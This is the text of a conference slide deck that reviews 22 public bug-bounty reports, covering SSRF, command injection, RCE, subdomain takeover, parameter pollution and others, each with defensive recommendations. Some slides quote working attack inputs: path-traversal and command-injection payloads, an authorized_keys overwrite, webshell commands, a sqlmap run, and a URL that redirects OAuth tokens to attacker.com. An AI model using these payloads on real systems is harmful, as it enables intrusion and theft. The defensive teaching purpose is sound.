SlideShare a Scribd company logo
1 of 182
Download to read offline
Watch How The
Giants Fall
John Melton
CodeMash 2020
Me
• Director, Product Security & OWASP guy
• twitter: _jtmelton
• github: jtmelton
• email: jtmelton@gmail.com
Agenda
• intro
• for each bug
• understand issue
• understand fix
• pointers to helpful tools
• wrap-up
Intro
• Security bugs are just bugs
• There are many types (714 weaknesses in
CWE across 237 categories)
• They go by many names (frustratingly
inconsistent)
• There is a wide range of complexity
• There is no such thing as a “top 10” for you
(see ecological fallacy)
A few bugs …
• Account Takeover
• Direct Object Reference
• XXE
• XSS
• RCE
• OS Command Injection
• Subdomain Takeover
• CSRF
• Sql Injection
• Insecure 3rd party libraries
• Missing Access Control
• SSRF
• Parameter Pollution
• Privilege Escalation
• Insecure Configuration
• Deserialization
• Authentication Bypass
• Hardcoded Password
0 / 22
Insecure 3rd Party
Libraries
https://hackerone.com/reports/248116
Insecure 3rd Party
Libraries
“One of the DoD applications uses a java
library which is vulnerable to expression
language injection. Using only an URL I was
able to inject java code. I made a simple PoC
that requests a name resolution to a DNS
server.
The application at https://███ uses
Primefaces version 5.3 which is vulnerable to
Expression Language injection through
DynamicContent generator.”
Insecure 3rd Party
Libraries
“With the code attached generate the payload
encrypted with the default key "primefaces".
With the payload from #1, send a GET request
using curl (curl -vk https://████/
javax.faces.resource/
dynamiccontent.properties.xhtml?
pfdrt=sc&ln=primefaces&pfdrid=<YOUR_PAYL
OAD_HERE>”
Insecure 3rd Party
Libraries
“You will receive a name resolution request for
remoteMalJarUrl from the DoD application.
We could use this DNS request to exfiltrate
data from the server. And as I said,
theoretically I could also delete files from the
server using the File class.”
Insecure 3rd Party
Libraries
Recommendations:
1. Update your libraries regularly! Even use
auto-updaters where possible (requires test
confidence)
2. Scan for known vulnerabilities. (OWASP
Dependency Check, Dependency Track)
3. Build a BOM (Dependency Track)
1 / 22
Privilege Escalation
https://hackerone.com/reports/694181
Privilege Escalation
“Because lack of security, attacker will be able
to remove original log file and replace it will a
symlink to other file.
After finishing job, host machine copy file from
docker container.
Because the original log file has been removed,
the host machine will copy the symlink file.
But the problem is it doesn't copy the linked
file in container, it copies the linked file in the
HOST MACHINE.”
Privilege Escalation
Privilege Escalation
Privilege Escalation
Recommendations:
• “We're currently in the process of deploying a
remediation involving removing symlinks from
data uploaded from the worker.”
• Sandbox sensitive processes
• Monitor logs
• Understand technology choices (docker
reading from host)
???
$2,000
2 / 22
Cross-Site Request
Forgery (CSRF)
https://hackerone.com/reports/630146
CSRF
“The POST request to /ocs/v2.php/apps/
provisioning_api/api/v1/config/apps/core/
encryption_enabled is missing a unique token,
so that if an attack can trick an admin user
with an active session to visit an attacker
controlled website, he/she can control the core
application setting "encryption_enabled"”
CSRF
curl -i -s -k -X $'POST' -H $'Host: <nextcloud_server>' -H $'Proxy-
Connection: keep-alive' -H $'Content-Length: 10' -H $'Accept: /' -H
$'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -
H $'OCS-APIREQUEST: true' -H $'Origin: http://<nextcloud_server>' -
H $'User-Agent: Mozilla/5.0 (Windows NT 6.1;WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96
Safari/537.36' -H $'X-Requested-With: XMLHttpRequest' -H
$'requesttoken:
sSxMouPIwzbpI5ErZycXzGqCsOzacYntRk18kUOwin4=:gBUhzYWys3
qhEqNPFE1frx663pq9BdjaKiwz5zfo6y4=' -H $'Accept-Encoding: gzip,
deflate' -H $'Accept-Language: en-US,en;q=0.9 ' -H $'Cookie:
<cookies>' --data-binary $'value=nox0dx0a' $'http://
<nextcloud_server>/ocs/v2.php/apps/provisioning_api/api/v1/
config/apps/core/encryption_enabled'
CSRF
“We are going to prevent this, but since you
can not abuse it really without being an admin,
and at that point you can also revert our patch,
it's not eligible for a bounty.”
CSRF
Recommendations:
• Use modern frameworks, enabling CSRF
config if necessary
• OWASP CSRF Cheat Sheet
• OWASP CSRFGuard
???
3 / 22
Server-Side Request
Forgery (SSRF)
https://hackerone.com/reports/198690
SSRF
“By sending a malformed HTTP request to
alerts.newrelic.com, it's possible to trick that
server into routing the request to an arbitrary
location. This can be exploited by an internet
based attacker to access internal services -
doing a quick scan of █████████ I was
able to access █████ etc.”
SSRF
SSRF
SSRF
“This code may look faultless - it takes the user-supplied
URL, replaces the domain with the hard-coded backend
server's address, and passes it along. Unfortunately the
Apache HttpComponents server library failed to require
that paths start with '/'. This meant that when I sent the
following request: ”
The code above rewrote this request as http://public-
backend@burp-collaborator.net/ and routed the request
to burp-collaborator.net.
SSRF
SSRF
SSRF
Recommendations:
• OWASP Injection Prevention Cheat Sheet
• Strict input validation
• Map commands if possible (3 -> ping)
• Encode output parameters
???
4 / 22
File Disclosure
https://hackerone.com/reports/671749
File Disclosure
“CVE-2019-11510 is a file disclosure due to
some normalization issues in pulse secure. I
was able to reproduce this by grabbing /etc/
passwd.
https://$hax/dana-na/../dana/html5acc/
guacamole/../../../../../../etc/passwd?/dana/
html5acc/guacamole/#”
File Disclosure
“The file /data/runtime/mtmp/lmdb/dataa/data.mdb
contains clear context passwords and usernames,
when a user logs in from here we can then access the
Pulse secure instance.”
File Disclosure
Recommendations:
• When doing file operations, always start with
a secure prefix
• Use whitelisted options where possible
• Normalize (canonicalize) input otherwise,
being careful to do full input validation
(length, type, encoding, semantic value, etc.)
???
$0
5 / 22
Insufficient
Authorization
https://hackerone.com/reports/676976
Insufficient
Authorization
“For public projects, GitLab allows to restrict CI
pipelines to project members only (public pipelines
disabled). However, in this case, the merge request
widget still renders the scanning reports result,
which is the outcome of a CI pipeline.
Unauthorized users have access to critical
information like the container scanning or
dependency scanning report, thus have a lot of
insight of an application. By knowing the found
vulnerabilities (or still existing), they could attack
the target application.”
Insufficient
Authorization
“Create a public project, restrict CI pipeline access to
project members, and disable public pipelines
Push a new branch and add .gitlab-ci.yml file, and
create a merge request with those changes
As an unauthorized user, visit the page  https://
example.gitlab.com/<namespace>/<public-project-
name>/merge_requests/1/merge_requests/1/
c o n t a i n e r _ s c a n n i n g _ re p o r t s  a n d  h t t p s : / /
example.gitlab.com/<namespace>/<public-project-
name>/merge_requests/1/merge_requests/1/
dependency_scanning_reports“
Insufficient
Authorization
Recommendations:
• Ensure your access control decision is
appropriate for the content
• OWASP Access Control Cheat Sheet
• Appropriate logging and monitoring
???
$3,000
6 / 22
Subdomain Takeover
https://hackerone.com/reports/661751
https://hackerone.com/reports/665398
Subdomain Takeover
1. Buy a domain at a hosting site
(123xyz.hosting.com)
2. Get a vanity domain (2017event.mysite.com)
3. Create cname record for vanity -> hosting
4. Hosting site expires (not needed anymore), but
cname is still there
5. Attacker registers hosting domain
6. Vanity domain now points to attacker site
Subdomain Takeover
“The dangling CNAME record of datacafe-
cert.starbucks.com is pointing to
s00397nasv101-datacafe-
cert.azurewebsites.net which was not claimed
by you. I registered a service with this name
and therefore was able to takeover the
subdomain. Every attacker doing this has
afterwords full control over the contents
served on this subdomain.”
Subdomain Takeover
1. Using dig, I was able to determine that the subdomain
'd02-1-ag.productioncontroller.starbucks.com' was
vulnerable to takeover. The record showed status:
NXDOMAIN and was pointing to the CNAME:
3edbac0a-5c43-428a-b451-a5eb268f888b.cloudapp.net.
2. Using this information, I was able to create a new Azure
Cloud Service with the name '3edbac0a-5c43-428a-b451-
a5eb268f888b'. This would resolve to the CNAME record
mentioned above.
3. I then crafted a website and uploaded it to the cloud
service using this as a guide: https://docs.microsoft.com/
en-us/azure/cloud-services/cloud-services-how-to-create-
deploy-portal.
4. I was then able to view the uploaded site at http://d02-1-
ag.productioncontroller.starbucks.com
Subdomain Takeover
Recommendations:
• Actively manage network infrastructure
• Run specialty subdomain scanning tools
against yourself
???
$2,000
$2,000
7 / 22
Web Cache Poisoning
https://hackerone.com/reports/622122
https://portswigger.net/research/practical-web-cache-poisoning
Web Cache Poisoning
“On https://paypal.com/, you could impact
core functionality by using an invalid
Transfer-Encoding header to replace
JavaScript files
from www.paypalobjects.com with the
message '501 Not Implemented'. This was
patched and awarded a $9,700 bounty.”
Web Cache Poisoning
Web Cache Poisoning
When XSSing yourself is
not just XSSing yourself!
Web Cache Poisoning
Recommendations:
• Take significant care with web caches
• Be careful about cache keys and what they’re
used for
???
$9,700
8 / 22
Insecure Configuration
https://hackerone.com/reports/415272
Insecure Configuration
“The slack binary from the Linux desktop
application is no position independent
executable:
$ file usr/lib/slack/slack

usr/lib/slack/slack: ELF 64-bit LSB executable,
x86-64, version 1 (SYSV), dynamically linked,
interpreter /lib64/ld-linux-x86-64.so.2, for
GNU/Linux 2.6.32, stripped
(pie executables report either "LSB shared
object" or "LSB pie executable”.)"
Insecure Configuration
“Position independent executables are
required for full ASLR support on Linux. Non-
pie-binaries are loaded to a fixed location, thus
allowing ROP attacks.
I'm aware that technically this is not a
vulnerability, but a lack of a hardening feature.
However given that ASLR is generally
considered standard practice these days and
that lack of it can mean very simple bugs can
directly lead to code execution I think it
deserves to be fixed.”
Insecure Configuration
“A simple memory corruption bug like a
buffer overflow can easily lead to a remote
code execution bug. With ASLR these bugs
are much harder and sometimes impossible to
exploit.”
Insecure Configuration
Recommendations:
• Make sure to enable secure default
configurations
• Use linters and scanners looking for bad
configs (language / framework specific
usually)
???
$100
9 / 22
Insecure Configuration
https://hackerone.com/reports/268382
Insecure Configuration
“Nginx misconfiguration leading to direct
PHP source code download
data.gov uses nginx as the web server. Due to
the server misconfiguration, instead of
processing the file, the .php source code is
send to the client requesting from the direct
url.”
Insecure Configuration
“attacker can download any .php file on the
web leading to huge information about the
server. data.gov implement saml (open-
source), the config.php file in the saml config
folder can be downloaded by the direct url
request, it contains sensitive information such
as: auth.adminpassword, tecnical contact
email, and (possibly) database password.”
Insecure Configuration
Recommendations:
• Make sure to enable secure default
configurations
• Use linters and scanners looking for bad
configs (language / framework specific
usually)
• If there’s a website, use active DAST
scanners (ZAP, Burp, Arachni, etc.)
???
$750
10 / 22
HTTP Parameter
Pollution (HPP)
https://hackerone.com/reports/114169
HPP
“I would like to report an issue on Digits web
authentication which allows attackers to retrieve the
OAuth credential data of an application victims
authorized.”
“…the login page has 2 parameters, consumer_key
and host. The former identifies which app a user
wants to authenticate, and the latter specifies which
domain the OAuth credential data is sent to after
authentication. In order to prevent other websites to
pretend to be the application, the host parameter
will be validated to see if it matches the registered
domain of the app. ”
HPP
https://www.digits.com/login?
consumer_key=9I4iINIyd0R01qEPEwT9IC6RE&host=https%3
A%2F%2Fwww.periscope.tv
host=https://www.periscope.tv matches the registered
domain
If we modify it:
https://www.digits.com/login?
consumer_key=9I4iINIyd0R01qEPEwT9IC6RE&host=https%3
A%2F%2Fattacker.com
host=https://attacker.com does not match the registered
domain, thus the page will show an error.
HPP
However, the validation can be bypassed with HPP (HTTP
Parameter Pollution). If we supply multiple host parameters,
the validation will only compare the first one but the last one
is used in the transfer step instead.
https://www.digits.com/login?
consumer_key=9I4iINIyd0R01qEPEwT9IC6RE&host=https%3
A%2F%2Fwww.periscope.tv&host=https%3A%2F%2Fattacker.c
om
The first host (host=https://www.periscope.tv) is validated
but not the second one. After authentication the second host
(host=https://attacker.com) is used as the transfer origin.
HPP
HPP
Recommendations:
• Understand the way your language /
framework / server handles multiple
parameters of the same name
• Understand server and client side HPP
• Input validation for HPP (reject/report)
???
$2,520
11 / 22
Command Injection
https://hackerone.com/reports/688270
Command Injection
“OS Command Injection in Nexus Repository
Manager 2.x (bypass CVE-2019-5475)”
“The Nexus Yum Repository Plugin is
vulnerable to Remote Code Execution. All
instances using CommandLineExecutor.java
with user-supplied data is vulnerable, such as
the Yum Configuration Capability. ”
Command Injection
Take a look at the patch for CVE-2019-5475
https://github.com/sonatype/nexus-public/
commit/
7b9939e71693422d3e09adc3744fa2e9b3a62a63
#diff-4ab0523de106ac7a38808f0231fc8a23R84
The getCleanCommand method is not
completely filtered and can still be bypassed.
Command Injection
Steps To Reproduce:
1.Navigate to "Capabilities" in Nexus
Repository Manager.

2.Edit or create a new Yum: Configuration
capability

3.Set path of "createrepo" or "mergerepo" to
an OS command (e.g. /bin/bash -c curl${IFS}
http://192.168.88.1:8000/ || /createrepo)
Command Injection
Recommendations:
• Validate input agressively
• OWASP Input Validation Cheat Sheet
???
$0
12 / 22
Hardcoded Key
https://hackerone.com/reports/716292
Hardcoded Key
“While going through Github search I
discovered a public repository which contains
Jumbcloud API Key of Starbucks.”
Hardcoded Key
POC:
List systems

curl -H "x-api-key: ████████" "https://
console.jumpcloud.com/api/systems"

There are multiple AWS instances present

curl -H "x-api-key: █████" "https://
console.jumpcloud.com/api/systemusers"

SSO Applications curl -H "x-api-key: ██████"
"https://console.jumpcloud.com/api/applications" AWS
login SAM config is presents. This would leads to AWS
account takeover
Hardcoded Key
This issue impact is critical as through this API
anyone could:
Execute commands on systems https://
docs.jumpcloud.com/1.0/commands/create-a-
command
Add/Remove users which has access to internal
systems
AWS Account Takeover
Hardcoded Key
Recommendations:
• Don’t hardcode keys
• Use HSM, Hashicorp Vault, etc.
• Run scanning tools looking for hardcoded
passwords and keys (git-secrets, gitleaks,
gitrob, trufflehog)
???
$4,000
13 / 22
Remote Code Execution
(RCE)
https://hackerone.com/reports/658013
RCE
1.Create a wiki new wiki page called page with the commit
message controlled content
2.Search for the wiki blob via the Search API, with the injected
ref flag: curl --header "PRIVATE-TOKEN: $TOKEN" 'http://
gitlab-vm.local/api/v4/projects/5/search?
scope=wiki_blobs&search=page&ref=--output=/tmp/file'
3.See that the file has been created:

git@gitlab-vm:~$ cat /tmp/file
commit f00f9538d29b176e9dfb2eb1bfe1eab190cad3d9
Author:Administrator <admin@example.com>
Date: Wed Jul 24 13:08:51 2019 +0000
controlled content
RCE
1.Create a new rsa key
2.Create a new wiki page setting the commit message to the rsa public key
3.Run the Search API with ref=--output=/var/opt/gitlab/.ssh/authorized_keys
4.ssh into gitlab using the created key:
$ ssh git@gitlab-vm.local -i gitlab
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-70-generic x86_64)
$ id
uid=998(git) gid=998(git) groups=998(git)
$ cat /var/opt/gitlab/.ssh/authorized_keys
commit 00c8e52996654d02bcbdba47dc25ee73671cbfd6
Author:Administrator <admin@example.com>
Date: Wed Jul 24 12:56:23 2019 +0000
ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQCxsqkWZobL5DBOnM3rtE7ZDP4d9v0lABJRGJbovHHTNY2iH
3x3pjjerPfLDO21Gkyfzn4J+x6O6GleMAB5nxnZRH7E44khfW6Ldql29Rv2Q/
IYCsBSKxGT6RCOFusoRi1uHlQmexIh4gZkmPeFfDLTy70Xv3FpPLfKE/
EiVOjuEtY9JUC4MVlPHaTzZ2HE4sZT5tvcm9YtSpjT2v0SMR8uCXcKMAx4Tsu/
Un2N5UziXgtRF+vD0fRhNyKIkOtULwBgWkL5RE71vYbxOhviqTAld7r70TIWSzSUHcUewbMS5XcEdBwl3XI
/9qzo+jOA0Ulf2bkkROpELBoHwfLdpu9p will@MacBook-Pro.local
RCE
Recommendations:
• Input Validation
• Lock down anything with files closely
???
$12,000
14 / 22
Remote Code Execution
(RCE)
https://hackerone.com/reports/506646
RCE
Webshell via File Upload on
ecjobs.starbucks.com.cn
1.Sign in the url(https://ecjobs.starbucks.com.cn)
and direct to the resume endpoint.
2.Use burp suite tools to interrupt the avatar
upload request.
3.Replace the filename type .jpg to asp which
have a space character behind and modify the
content
After that you have uploaded malicious files on
the server and run any os command on server
you wanted.
RCE
curl ‘https://ecjobs.starbucks.com.cn/recruitjob/tempfiles/
temp_uploaded_739175df-5949-4bba-9945-1c1720e8e109.asp?getsc=dir%20d:TrustHX
STBKSERM101www_app%20%2fd%2fs%2fb'
HTTP/1.1 200 OK
Date: Fri, 08 Mar 2019 02:56:19 GMT
Server: wswaf/2.13.0-5.el6
…
Content-Length: 1814533
<html>
<body>
<h1>POC by hackerone_john stone</h1>
<textarea readonly cols=80 rows=25>
d:TrustHXSTBKSERM101www_appbin
d:TrustHXSTBKSERM101www_appcommon
d:TrustHXSTBKSERM101www_appconcurrent_test
d:TrustHXSTBKSERM101www_appDefault.aspx
d:TrustHXSTBKSERM101www_appGlobal.asax
d:TrustHXSTBKSERM101www_apphximages_v6
....................................
</textarea>
</body>
</html>
RCE
curl $'https://ecjobs.starbucks.com.cn/recruitjob/tempfiles/
temp_uploaded_739175df-5949-4bba-9945-1c1720e8e109.asp?getsc=type%20d:TrustHXSTBKSERM101www_app
concurrent_testnew_application_concurrent_test__svc.cs'
HTTP/1.1 200 OK
Date: Fri, 08 Mar 2019 03:37:39 GMT
…
Connection: close
Content-Length: 33316
<html>
<body>
<h1>POC by hackerone_john stone</h1>
<textarea readonly cols=80 rows=25>
using System;
using System.Collections.Generic;
using System.ComponentModel;
…
using hxmd = TrustHX.HXMD6;
class new_application_concurrent_test : IHXPageXmlService
{
#region IHXPageXmlService æå
…
case "CONCURRENT_TEST":return ConcurrentTest.ConcurrentTestProcess(strSystemCode,
strPageXmlServiceContent);
default:
string strErrorMessageText =
....................................
</textarea>
</body>
</html>
RCE
Recommendations:
• Input Validation
• Lock down anything with files closely
???
$4,000
15 / 22
Insecure Design
https://hackerone.com/reports/574638
Insecure Design
“When requesting a ride, it was possible to
intercept the request and forward it with 3
random characters at the end of the
paymentProfileUuid parameter.
This would cause the ride to disappear from
both the Rider and Driver's trip history, the
Rider would not be charged, and the Driver
would not receive payment for the trip.”
Insecure Design
Recommendations:
• Input Validation
• Appropriate Monitoring
• Fraud Detection
???
$1,500
16 / 22
SQL Injection (sqli)
https://hackerone.com/reports/390879
Sqli
Steps to Reproduce:
1.python sqlmap.py -u https://REPLACE-ME/public/
saveCount.cfm?countID=4 --level=3 --risk=3
Impact
Attacker can take control over the database server.
Sqli
Recommendations:
1. Use modern frameworks and libraries
2. Build safe APIs
3. Scan with SAST
4. Scan with DAST (sqlmap)
???
$0
17 / 22
Hardcoded Token
https://hackerone.com/reports/396467
Hardcoded Token
“GitHub is a truly awesome service but it is
unwise to put any sensitive data in code that is
hosted on GitHub and similar services as i was
able to find github token indexed  7 hours
Ago  by user  ██████ - Software Engineer -
Snap Inc”
Hardcoded Token
“I know it’s not my right to ask, just out of
curiosity, what was the impact of the above if
it reached bad hands? Doesn’t the google
authentication somehow protect the access to
this site even with the token leaked ?
The web interface needed a valid snap account,
but not the API.”
Hardcoded Token
Recommendations:
• Don’t hardcode tokens
• Use HSM, Hashicorp Vault, etc.
• Run scanning tools looking for hardcoded
tokens (git-secrets, gitleaks, gitrob,
trufflehog)
???
$15,000
18 / 22
Insecure Design
https://hackerone.com/reports/442901
Insecure Design
When a user creates an account using Google or
Facebook and does not set an additional
password, it is possible to set their passwords
via CSRF.
Since the account is created using a social media
account, no existing password check is needed
and the CSRF check on the endpoint is broken.
An attacker can take over of accounts created
using Google or Facebook.
Insecure Design
Recommendations:
• Input Validation
• Consider cross-feature impacts
???
19 / 22
Insecure Design
https://hackerone.com/reports/202781
Insecure Design
Chained Bugs to LeakVictim's Uber's FB Oauth Token
1.Prompt OAuth authorization on facebook.com
2.Redirect to https://auth.uber.com/login?next_url=https://
login.uber.com/logout from Facebook
3.Redirect to https://login.uber.com/
logout from auth.uber.com
4.Redirect to attacker site from Referer header and return
the token
When combined, this would have allowed for a full account
takeover
Insecure Design
Recommendations:
• Input Validation
• Consider cross-feature impacts
???
$7,500
20 / 22
Account Takeover
https://hackerone.com/reports/143717
Account Takeover
“Through the endpoint at /rt/users/
passwordless-signup it is possible to change
the password of any Uber user, given
knowledge of their phone number (or by just
enumerating phone numbers until one is found
that is registered with Uber - not too hard
given the number of Uber users).”
Account Takeover
Account Takeover
Recommendations:
• Authenticate / re-authenticate important
activities
• Consider behavioral analysis
???
$10,000
21 / 22
Insecure Design
https://hackerone.com/reports/155618
Insecure Design
“There is a vulnerability in Vimeo which allows
any user to watch password video without the
password.
A user can like a passworded video without
password, then the user can watch the video
on Couchmode without the password.”
Insecure Design
Insecure Design
Recommendations:
• Carefully consider interactions across
features
• Don’t actually depend on security by
obscurity
• Emit as little metadata as possible
???
$500
22 / 22
Insecure Design
https://hackerone.com/reports/218230
+
Insecure Design
“I found a way to become a verified GitLab
team member on Slack. By doing so, I gained
access to dozens of channels possibly
containing sensitive information. ”
Insecure Design
Insecure Design
Insecure Design
Insecure Design
Insecure Design
Insecure Design
Recommendations:
• Threat Model your applications
• Consider a bug bounty
• Hire smart people
???
$0
So … what
now?
There is hope …
• Follow security design principles
• Keep knowledge current
• Spend effort throughout SDLC
• Focus on key controls (2fa, input validation)
• Work on prevention, but also detection and response
• Patch
• (try bug bounties - make some extra $)
Questions
• twitter: _jtmelton
• github: jtmelton
• email: jtmelton@gmail.com

More Related Content

What's hot

DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDays Riga
 
Kubernetes Security
Kubernetes SecurityKubernetes Security
Kubernetes Securityinovex GmbH
 
Practical Approaches to Container Security
Practical Approaches to Container SecurityPractical Approaches to Container Security
Practical Approaches to Container SecurityShea Stewart
 
Security threats with Kubernetes - Igor Khoroshchenko
 Security threats with Kubernetes - Igor Khoroshchenko Security threats with Kubernetes - Igor Khoroshchenko
Security threats with Kubernetes - Igor KhoroshchenkoKuberton
 
Zombies in Kubernetes
Zombies in KubernetesZombies in Kubernetes
Zombies in KubernetesThomas Fricke
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Aqua Security
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Velocidex Enterprises
 
Container Security Essentials
Container Security EssentialsContainer Security Essentials
Container Security EssentialsDNIF
 
InSpec Workshop DevSecCon 2017
InSpec Workshop DevSecCon 2017InSpec Workshop DevSecCon 2017
InSpec Workshop DevSecCon 2017Mandi Walls
 
Kubernetes and container security
Kubernetes and container securityKubernetes and container security
Kubernetes and container securityVolodymyr Shynkar
 
Hacking into your containers, and how to stop it!
Hacking into your containers, and how to stop it!Hacking into your containers, and how to stop it!
Hacking into your containers, and how to stop it!Eric Smalling
 
All Your Containers Are Belong To Us
All Your Containers Are Belong To UsAll Your Containers Are Belong To Us
All Your Containers Are Belong To UsLacework
 
Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13
Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13
Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13Zach Hill
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guysNick Landers
 
Understanding container security
Understanding container securityUnderstanding container security
Understanding container securityJohn Kinsella
 
Cloud Compliance with Open Policy Agent
Cloud Compliance with Open Policy AgentCloud Compliance with Open Policy Agent
Cloud Compliance with Open Policy AgentQAware GmbH
 
Container Runtime Security with Falco
Container Runtime Security with FalcoContainer Runtime Security with Falco
Container Runtime Security with FalcoMichael Ducy
 

What's hot (20)

DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security
 
Kubernetes Security
Kubernetes SecurityKubernetes Security
Kubernetes Security
 
Practical Approaches to Container Security
Practical Approaches to Container SecurityPractical Approaches to Container Security
Practical Approaches to Container Security
 
Kube Apps in action
Kube Apps in actionKube Apps in action
Kube Apps in action
 
Security threats with Kubernetes - Igor Khoroshchenko
 Security threats with Kubernetes - Igor Khoroshchenko Security threats with Kubernetes - Igor Khoroshchenko
Security threats with Kubernetes - Igor Khoroshchenko
 
Kubernetes security
Kubernetes securityKubernetes security
Kubernetes security
 
Zombies in Kubernetes
Zombies in KubernetesZombies in Kubernetes
Zombies in Kubernetes
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes
 
Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3Digital Forensics and Incident Response in The Cloud Part 3
Digital Forensics and Incident Response in The Cloud Part 3
 
Container Security Essentials
Container Security EssentialsContainer Security Essentials
Container Security Essentials
 
InSpec Workshop DevSecCon 2017
InSpec Workshop DevSecCon 2017InSpec Workshop DevSecCon 2017
InSpec Workshop DevSecCon 2017
 
Kubernetes and container security
Kubernetes and container securityKubernetes and container security
Kubernetes and container security
 
Hacking into your containers, and how to stop it!
Hacking into your containers, and how to stop it!Hacking into your containers, and how to stop it!
Hacking into your containers, and how to stop it!
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
All Your Containers Are Belong To Us
All Your Containers Are Belong To UsAll Your Containers Are Belong To Us
All Your Containers Are Belong To Us
 
Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13
Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13
Open Source Tools for Container Security and Compliance @Docker LA Meetup 2/13
 
Outlook and Exchange for the bad guys
Outlook and Exchange for the bad guysOutlook and Exchange for the bad guys
Outlook and Exchange for the bad guys
 
Understanding container security
Understanding container securityUnderstanding container security
Understanding container security
 
Cloud Compliance with Open Policy Agent
Cloud Compliance with Open Policy AgentCloud Compliance with Open Policy Agent
Cloud Compliance with Open Policy Agent
 
Container Runtime Security with Falco
Container Runtime Security with FalcoContainer Runtime Security with Falco
Container Runtime Security with Falco
 

Similar to Watch How The Giants Fall: Learning from Bug Bounty Results

ITB_2023_25_Most_Dangerous_Software_Weaknesses_Pete_Freitag.pdf
ITB_2023_25_Most_Dangerous_Software_Weaknesses_Pete_Freitag.pdfITB_2023_25_Most_Dangerous_Software_Weaknesses_Pete_Freitag.pdf
ITB_2023_25_Most_Dangerous_Software_Weaknesses_Pete_Freitag.pdfOrtus Solutions, Corp
 
How to measure your security response readiness?
How to measure your security response readiness?How to measure your security response readiness?
How to measure your security response readiness?Tomasz Jakubowski
 
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsDevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer Tools
DevOps on AWS: Deep Dive on Continuous Delivery and the AWS Developer ToolsAmazon Web Services
 
12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes Cluster12 Ways Not to get 'Hacked' your Kubernetes Cluster
12 Ways Not to get 'Hacked' your Kubernetes ClusterSuman Chakraborty
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers Lewis Ardern
 
Watch How the Giants Fall
Watch How the Giants FallWatch How the Giants Fall
Watch How the Giants Falljtmelton
 
Abusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryAbusing bleeding edge web standards for appsec glory
Abusing bleeding edge web standards for appsec gloryPriyanka Aash
 
Attack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuAttack Chaining: Advanced Maneuvers for Hack Fu
Attack Chaining: Advanced Maneuvers for Hack FuRob Ragan
 
Appsecco Kubernetes Hacking Masterclass Presentation Slides
Appsecco Kubernetes Hacking Masterclass Presentation SlidesAppsecco Kubernetes Hacking Masterclass Presentation Slides
Appsecco Kubernetes Hacking Masterclass Presentation SlidesAppsecco
 
Protecting your organization against attacks via the build system
Protecting your organization against attacks via the build systemProtecting your organization against attacks via the build system
Protecting your organization against attacks via the build systemLouis Jacomet
 
Security for cloud native workloads
Security for cloud native workloadsSecurity for cloud native workloads
Security for cloud native workloadsRuncy Oommen
 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
 
How to secure your web applications with NGINX
How to secure your web applications with NGINXHow to secure your web applications with NGINX
How to secure your web applications with NGINXWallarm
 
A Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo SandboxA Distributed Malware Analysis System Cuckoo Sandbox
A Distributed Malware Analysis System Cuckoo SandboxAndy Lee
 
DevOps on AWS: Accelerating Software Delivery with the AWS Developer Tools
DevOps on AWS: Accelerating Software Delivery with the AWS Developer ToolsDevOps on AWS: Accelerating Software Delivery with the AWS Developer Tools
DevOps on AWS: Accelerating Software Delivery with the AWS Developer ToolsAmazon Web Services
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?Nathan Van Gheem
 
Docker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platformsDocker Swarm secrets for creating great FIWARE platforms
Docker Swarm secrets for creating great FIWARE platformsFederico Michele Facca
 
CI / CD / CS - Continuous Security in Kubernetes
CI / CD / CS - Continuous Security in KubernetesCI / CD / CS - Continuous Security in Kubernetes
CI / CD / CS - Continuous Security in KubernetesSysdig
 
